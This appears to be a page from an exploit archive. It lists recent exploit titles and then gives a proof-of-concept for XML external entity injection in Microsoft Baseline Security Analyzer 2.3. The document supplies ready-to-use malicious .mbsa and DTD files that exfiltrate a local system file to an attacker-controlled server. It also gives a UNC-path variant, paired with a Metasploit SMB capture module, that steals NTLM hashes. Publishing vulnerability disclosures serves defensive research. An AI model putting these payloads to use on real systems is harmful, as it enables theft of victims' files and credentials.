87053f010c
12 changes to exploits/shellcodes SocuSoft iPod Photo Slideshow 8.05 - Buffer Overflow (SEH) Socusoft 3GP Photo Slideshow 8.05 - Buffer Overflow (SEH) Photo To Video Converter Professional 8.07 - Buffer Overflow (SEH) Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection Flash Slideshow Maker Professional 5.20 - Buffer Overflow (SEH) Any Sound Recorder 2.93 - Denial of Service (PoC) Zenmap (Nmap) 7.70 - Denial of Service (PoC) Ghostscript - Failed Restore Command Execution (Metasploit) VirtualBox 5.2.6.r120293 - VM Escape Apache Struts 2 - Namespace Redirect OGNL Injection (Metasploit) RPi Cam Control <= 6.3.14 - Multiple Vulnerabilities RPi Cam Control < 6.3.14 - Multiple Vulnerabilities LW-N605R 12.20.2.1486 - Remote Code Execution RPi Cam Control < 6.4.25 - 'preview.php' Remote Command Execution
52 lines
No EOL
1.7 KiB
Text
52 lines
No EOL
1.7 KiB
Text
# Title: Microsoft Baseline Security Analyzer 2.3 - XML External Entity Injection
|
|
# Date: 2018-09-08
|
|
# Author: John Page (aka hyp3rlinx)
|
|
# Vendor: Microsoft
|
|
# Software link: https://www.microsoft.com/en-us/download/details.aspx?id=7558
|
|
# Software Version: 2.3
|
|
# References: ZDI-CAN-6307
|
|
# References: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt
|
|
# References: hyp3rlinx.altervista.org
|
|
|
|
# Security Issue
|
|
# Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker
|
|
# controlled server if a user opens a specially crafted ".mbsa" file.
|
|
|
|
# Exploit/POC
|
|
|
|
# Install MBSA
|
|
# https://www.microsoft.com/en-us/download/details.aspx?id=7558
|
|
|
|
# 1) "evil.mbsa"
|
|
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE fileppe_fingerz [
|
|
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
|
|
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
|
|
%dtd;]>
|
|
<pwn>&send;</pwn>
|
|
|
|
# 2) "payload.dtd"
|
|
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
|
|
%all;
|
|
|
|
# When victim attempts open file they get prompted "Do you want to let this app
|
|
# make changes to your device?" However, it also indicates it is a "verified publisher" namely Microsoft.
|
|
# After opening the local users files can be exfiltrated to a remote server.
|
|
# Moreover, we can use this to steal NTLM hashes.
|
|
|
|
# Using Forced Authentication to steal NTLM hashes
|
|
|
|
# 2) msf > use auxiliary/server/capture/smb
|
|
# msf auxiliary(smb) > exploit -j
|
|
|
|
"evil.mbsa"
|
|
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE fileppe_fingerz [
|
|
<!ENTITY % dtd SYSTEM "\\192.168.114.153\unknwonfilez">
|
|
%dtd;]>
|
|
|
|
# Result: credentials captured by remote sever |